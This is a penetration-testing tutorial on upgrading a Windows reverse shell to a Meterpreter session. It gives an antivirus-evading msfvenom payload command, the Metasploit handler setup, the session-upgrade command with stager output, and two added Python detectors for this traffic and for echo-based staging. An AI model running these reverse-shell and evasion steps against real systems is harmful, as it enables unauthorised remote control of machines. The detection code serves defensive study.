In today's article I will go through the steps needed to turn a simple shell into a Meterpreter session. This can be very useful, especially when during a penetration test you are forced to use a simple shell because it is a small file and has some capacity to evade IDS/IPS/AV.
#ST2Labs
>> Step 1: Generating a small shell
As already seen in my other articles (I, II and III), we will generate an EXE with a reverse_tcp shell, using antivirus-evasion and size-reduction techniques.
root@ST2Labs:~# msfvenom -p windows/shell/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00\x0d\x0a\x20' -f exe-small LHOST=192.168.2.105 LPORT=80 > /tmp/tcpviewshell.exe
The result is:
tcpviewshell.exe (~5 KB). On VirusTotal it gets 17/45 (37%) detection, and some of the main antivirus engines do not detect it; see the report using the following SHA256: 4684f19fa27ae5d7baf86aabf854ba61d29c444b627eb08305afcedc01a906ca
>> Step 2: Configuring Metasploit to handle the reverse connection on port 80
For this we use the msfconsole command, as follows:
msf exploit(handler) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(handler) > set LPORT 80
LPORT => 80
msf exploit(handler) > set LHOST 192.168.2.105
LHOST => 192.168.2.105
msf exploit(handler) > set EnableContextEncoding true
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.2.105:80
[*] Starting the payload handler...
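The handler above listens on TCP/80 so the reverse connection blends in with web traffic, but the payload is reverse_tcp, not HTTP: the handler pushes the stage as soon as the client connects, and nothing on the wire looks like a request line. The following added example (my own code, not part of the original post or of Metasploit) shows the check a network defender can run over flow records for web ports: flag connections where the server speaks first, or where the client's first bytes are not an HTTP request line. The flow records, the `Flow` layout and the stage bytes are constructed for the example; the addresses and port come from the post.

```python
import re
from dataclasses import dataclass

# HTTP/1.x request line: METHOD SP request-target SP HTTP/1.x CRLF
REQUEST_LINE = re.compile(rb"^([A-Z]{3,7}) (\S+) HTTP/1\.[01]\r\n")
HTTP_METHODS = {b"GET", b"POST", b"HEAD", b"PUT", b"DELETE",
                b"OPTIONS", b"PATCH", b"TRACE", b"CONNECT"}
WEB_PORTS = {80, 8080}   # plaintext web ports where we expect HTTP framing


@dataclass
class Flow:
    """One TCP connection as a sensor might summarise it (constructed layout)."""
    client: str
    server: str
    dport: int
    first_sender: str      # "client" or "server": which side sent payload bytes first
    client_first: bytes    # first payload bytes sent by the client (b"" if none)
    server_first: bytes    # first payload bytes sent by the server (b"" if none)


def looks_like_http_request(data: bytes) -> bool:
    """True if the bytes start with a well-formed HTTP/1.x request line."""
    m = REQUEST_LINE.match(data)
    return m is not None and m.group(1) in HTTP_METHODS


def classify_flow(flow: Flow) -> str:
    """Return 'ok' or a short reason why traffic on a web port does not look like HTTP."""
    if flow.dport not in WEB_PORTS:
        return "ok"                      # outside the scope of this check
    if flow.first_sender == "server":
        # A reverse_tcp handler sends the stage before the client says anything;
        # a real web server never sends data before receiving a request.
        return "server-speaks-first"
    if not looks_like_http_request(flow.client_first):
        return "non-http-client-data"
    return "ok"


def scan(flows):
    """Return (client, server, dport, verdict) for every flow that is not 'ok'."""
    alerts = []
    for f in flows:
        verdict = classify_flow(f)
        if verdict != "ok":
            alerts.append((f.client, f.server, f.dport, verdict))
    return alerts


# Constructed sample flows (not real captures). The stage bytes are opaque filler.
SAMPLE_FLOWS = [
    # Ordinary web request: client speaks first with a request line.
    Flow("192.168.2.137", "203.0.113.10", 80, "client",
         b"GET /index.html HTTP/1.1\r\nHost: example.com\r\n\r\n",
         b"HTTP/1.1 200 OK\r\n"),
    # reverse_tcp-style connection to the handler: server pushes data first.
    Flow("192.168.2.137", "192.168.2.105", 80, "server",
         b"", b"\x10\x00\x00\x00" + bytes(16)),
    # Client speaks first, but with binary data rather than an HTTP request.
    Flow("192.168.2.137", "192.168.2.105", 80, "client",
         b"\x00\x01\x02\x03", b""),
    # TLS on 443 is not covered by this check.
    Flow("192.168.2.137", "203.0.113.10", 443, "client",
         b"\x16\x03\x01", b"\x16\x03\x03"),
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_FLOWS):
        print("ALERT", alert)
```

The method allowlist and the strict CRLF requirement are deliberately tight; an `h2c` preface (`PRI * HTTP/2.0`) or a sloppy client that ends the request line with a bare LF would be flagged too, so tune the allowlist to what your environment legitimately sends. The check is specific to raw-TCP payloads on a web port: Metasploit's reverse_http and reverse_https payloads do carry HTTP framing and would pass it.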
>> Step 3: Running tcpviewshell.exe on Windows XP SP3
The result is as follows:
[Image: upgrading the win32 shell to a Meterpreter session]
Now we upgrade the win32 shell to a Meterpreter session. What actually happens is that a file is uploaded to the remote machine using the echo command.
To perform the upgrade, run the command sessions -u [shell_session_id]
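Because the upgrade is driven by the echo command, it leaves a distinctive trace on the endpoint: a burst of command lines from the same parent process, each appending a chunk of data to the same file, at a pace that matches the "Command Stager progress" lines the handler prints. The following added example (my own detection logic, not code from the original post or from Metasploit) scans process-creation log lines for that pattern. The log layout (`timestamp|parent_pid|command_line`), the sample command lines and the thresholds are constructed assumptions for the example; whether the stager writes via `>>` to a file under %TEMP% on a given Metasploit version is an assumption as well, which is why the rule keys only on repeated echo redirections to one target.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Matches "echo <data> > file" or "echo <data> >> file" anywhere in a command line
# and captures the redirection target.
ECHO_REDIRECT = re.compile(
    r"\becho\s+.+?\s*>{1,2}\s*\"?(?P<target>[^\s\"&|]+)", re.IGNORECASE)


def build_sample_log():
    """Constructed process-creation log (not from the original post).
    Layout per line: ISO timestamp|parent pid|command line."""
    base = datetime(2013, 3, 22, 18, 2, 30)
    lines = [
        f"{base.isoformat()}|1104|cmd.exe /c dir C:\\Users",
        # A single redirected echo is normal admin activity and must not alert.
        f"{(base + timedelta(seconds=1)).isoformat()}|1104|"
        f"cmd.exe /c echo done > C:\\Temp\\notes.txt",
    ]
    # Thirty chunked appends to one file from one parent, one per second:
    # the shape an echo-based command stager leaves behind (assumed layout).
    for i in range(30):
        ts = (base + timedelta(seconds=2 + i)).isoformat()
        lines.append(f"{ts}|1104|cmd.exe /c echo CHUNK{i:02d}DATA >> %TEMP%\\stage.txt")
    lines.append(f"{(base + timedelta(seconds=40)).isoformat()}|2200|cmd.exe /c echo hello")
    return lines


def detect_echo_staging(lines, min_writes=20, window=timedelta(seconds=60)):
    """Alert when one parent process redirects echo output to the same file
    at least `min_writes` times within `window`. Returns a list of dicts."""
    writes = defaultdict(list)          # (parent_pid, target) -> [timestamps]
    for line in lines:
        ts, ppid, cmd = line.split("|", 2)
        m = ECHO_REDIRECT.search(cmd)
        if m is None:
            continue
        writes[(ppid, m.group("target").lower())].append(datetime.fromisoformat(ts))

    alerts = []
    for (ppid, target), stamps in writes.items():
        stamps.sort()
        # Sliding window: does any run of min_writes consecutive writes fit in `window`?
        for i in range(len(stamps) - min_writes + 1):
            if stamps[i + min_writes - 1] - stamps[i] <= window:
                alerts.append({
                    "parent_pid": ppid,
                    "target": target,
                    "writes": len(stamps),
                    "first": stamps[0].isoformat(),
                    "last": stamps[-1].isoformat(),
                })
                break
    return alerts


if __name__ == "__main__":
    for alert in detect_echo_staging(build_sample_log()):
        print("ALERT: chunked echo writes", alert)
```

Twenty redirected echoes from one parent inside a minute is rare for interactive use but trivially exceeded by a stager that needs tens of thousands of bytes on disk; the post's own handler output (60 progress steps for 102108 bytes) gives a feel for the volume. Tune `min_writes` and `window` against your baseline, and treat a hit as a reason to pull the parent process tree and the target file, not as proof on its own.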
msf exploit(handler) > sessions -u 1
[*] Started reverse handler on 192.168.2.105:80
[*] Starting the payload handler...
[*] Command Stager progress - 1.66% done (1699/102108 bytes)
[*] Command Stager progress - 3.33% done (3398/102108 bytes)
[*] Command Stager progress - 4.99% done (5097/102108 bytes)
[*] Command Stager progress - 6.66% done (6796/102108 bytes)
[*] Command Stager progress - 8.32% done (8495/102108 bytes)
[*] Command Stager progress - 9.98% done (10194/102108 bytes)
[*] Command Stager progress - 11.65% done (11893/102108 bytes)
[*] Command Stager progress - 13.31% done (13592/102108 bytes)
[*] Command Stager progress - 14.98% done (15291/102108 bytes)
[*] Command Stager progress - 16.64% done (16990/102108 bytes)
[*] Command Stager progress - 18.30% done (18689/102108 bytes)
[*] Command Stager progress - 19.97% done (20388/102108 bytes)
[*] Command Stager progress - 21.63% done (22087/102108 bytes)
[*] Command Stager progress - 23.29% done (23786/102108 bytes)
[*] Command Stager progress - 24.96% done (25485/102108 bytes)
[*] Command Stager progress - 26.62% done (27184/102108 bytes)
[*] Command Stager progress - 28.29% done (28883/102108 bytes)
[*] Command Stager progress - 29.95% done (30582/102108 bytes)
[*] Command Stager progress - 31.61% done (32281/102108 bytes)
[*] Command Stager progress - 33.28% done (33980/102108 bytes)
[*] Command Stager progress - 34.94% done (35679/102108 bytes)
[*] Command Stager progress - 36.61% done (37378/102108 bytes)
[*] Command Stager progress - 38.27% done (39077/102108 bytes)
[*] Command Stager progress - 39.93% done (40776/102108 bytes)
[*] Command Stager progress - 41.60% done (42475/102108 bytes)
[*] Command Stager progress - 43.26% done (44174/102108 bytes)
[*] Command Stager progress - 44.93% done (45873/102108 bytes)
[*] Command Stager progress - 46.59% done (47572/102108 bytes)
[*] Command Stager progress - 48.25% done (49271/102108 bytes)
[*] Command Stager progress - 49.92% done (50970/102108 bytes)
[*] Command Stager progress - 51.58% done (52669/102108 bytes)
[*] Command Stager progress - 53.25% done (54368/102108 bytes)
[*] Command Stager progress - 54.91% done (56067/102108 bytes)
[*] Command Stager progress - 56.57% done (57766/102108 bytes)
[*] Command Stager progress - 58.24% done (59465/102108 bytes)
[*] Command Stager progress - 59.90% done (61164/102108 bytes)
[*] Command Stager progress - 61.57% done (62863/102108 bytes)
[*] Command Stager progress - 63.23% done (64562/102108 bytes)
[*] Command Stager progress - 64.89% done (66261/102108 bytes)
[*] Command Stager progress - 66.56% done (67960/102108 bytes)
[*] Command Stager progress - 68.22% done (69659/102108 bytes)
[*] Command Stager progress - 69.88% done (71358/102108 bytes)
[*] Command Stager progress - 71.55% done (73057/102108 bytes)
[*] Command Stager progress - 73.21% done (74756/102108 bytes)
[*] Command Stager progress - 74.88% done (76455/102108 bytes)
[*] Command Stager progress - 76.54% done (78154/102108 bytes)
[*] Command Stager progress - 78.20% done (79853/102108 bytes)
[*] Command Stager progress - 79.87% done (81552/102108 bytes)
[*] Command Stager progress - 81.53% done (83251/102108 bytes)
[*] Command Stager progress - 83.20% done (84950/102108 bytes)
[*] Command Stager progress - 84.86% done (86649/102108 bytes)
[*] Command Stager progress - 86.52% done (88348/102108 bytes)
[*] Command Stager progress - 88.19% done (90047/102108 bytes)
[*] Command Stager progress - 89.85% done (91746/102108 bytes)
[*] Command Stager progress - 91.52% done (93445/102108 bytes)
[*] Command Stager progress - 93.18% done (95144/102108 bytes)
[*] Command Stager progress - 94.84% done (96843/102108 bytes)
[*] Command Stager progress - 96.51% done (98542/102108 bytes)
[*] Command Stager progress - 98.15% done (100216/102108 bytes)
[*] Command Stager progress - 99.78% done (101888/102108 bytes)
[*] Command Stager progress - 100.00% done (102108/102108 bytes)
[*] Sending stage (752128 bytes) to 192.168.2.137
[*] Meterpreter session 2 opened (192.168.2.105:80 -> 192.168.2.137:1107) at 2013-03-22 18:03:07 +0100
msf exploit(handler) > sessions
Finally, a second remote session with a Meterpreter interface is obtained; see the following image:
[Image: Upgrading win32 shell to meterpreter.]
ST2Labs
#Pentesting Rulez!